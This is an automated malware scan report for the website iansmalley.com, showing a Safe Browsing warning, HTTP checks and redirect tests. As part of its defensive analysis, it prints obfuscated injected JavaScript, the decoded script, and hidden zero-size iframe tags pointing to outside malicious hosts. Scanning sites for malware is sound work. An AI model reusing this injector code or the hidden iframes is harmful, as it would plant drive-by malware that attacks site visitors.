Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iansmalley.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iansmalley.com/ | 200 OK Content-Length: 10272 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var $2=((t\u006Fp+0)[[]^[]]=='\x5B');if($2){$T=['e','%3,%1+%2~%9$%f^%b:%5?%4)%c|%0-%a!%8<%6#%7[%d('];}var $o={'$2P':[],'$If':'decode\x55\x52\x49\x43\x6F\x6D\x70\x6F\x6Eent','$6z':true,'$Nc':'spl\x69t','$pd':'\x6A\x6Fin','$aF':'su\x62\x73\x74r'},$Sq=function(_){for($L=~$o.$2P-~$o.$2P;$L<$c[_];$L+=-~$o.$6z){$T+='\x25'+$c[$L++]+$c[$L--];}$v['ev\x61\x6C']($v[$o.$If]($T));},$c='[##+[~~-?^[?~|?^,([:~[?^):)$~[,!~[#$?|[<,#)??|[<,#)??|[<,#,??|[<,[,~)<?))()|~[~|~[?^#`#?~[,!~[[[[~#$?|[ Decoded script: var _u,_={'_KI':'i\x6E\x6E\x65\x72HTML','_ne':'wri\x74e','_x':'do\x63\x75\x6D\x65nt','_':this,'_e':'c\x72\x65\x61\x74eElement','_Am':'set\x41\x74\x74\x72ibute','_Rd':'appendCh\x69\x6C\x64'},_g=function(_R){return _._[_._x][_._e](_R);},_U=_g('iframe'),_iX=_g('\x64iv'),_g=_g('d\x69v'),_fC=function(_R,_V){for(var _h3 in _V){_R[_._Am](_V[_h3][0], _V[_h3][-~[]]);}},_u=_fC(_U,[['\x73rc','http://goojle.nl-web.net/google.php'],['w\x69\x64th','78'],['he\x69\x67ht','\x397'],['bord\x65\x72','0'],['fra undefined Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://thetrainingbrokerage.co.uk/r.php <iframe src="http://thetrainingbrokerage.co.uk/r.php" width=0 height=0 frameborder=0> Hidden iFrame found. size: 0x0 src: http://lotsofmots.gv.vg/showthread.php?t=82151300 <iframe src="http://lotsofmots.gv.vg/showthread.php?t=82151300" width=0 height=0 frameborder=0> | ||
http://merchant.aegispayments.com/in.cgi?default | 500 Can't connect to merchant.aegispayments.com:80 Content-Length: 201 Content-Type: text/plain | clean |
http://merchant.aegispayments.com/test404page.js | 500 Can't connect to merchant.aegispayments.com:80 Content-Length: 201 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iansmalley.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 21:27:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10272
Content-Type: text/html
...10272 bytes of data.
GET / HTTP/1.1
Host: iansmalley.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 21:27:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10272
Content-Type: text/html
...10272 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iansmalley.com
Referer: http://www.google.com/search?q=iansmalley.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iansmalley.com
Referer: http://www.google.com/search?q=iansmalley.com
Result:
The result is similar to the first query. There are no suspicious redirects found.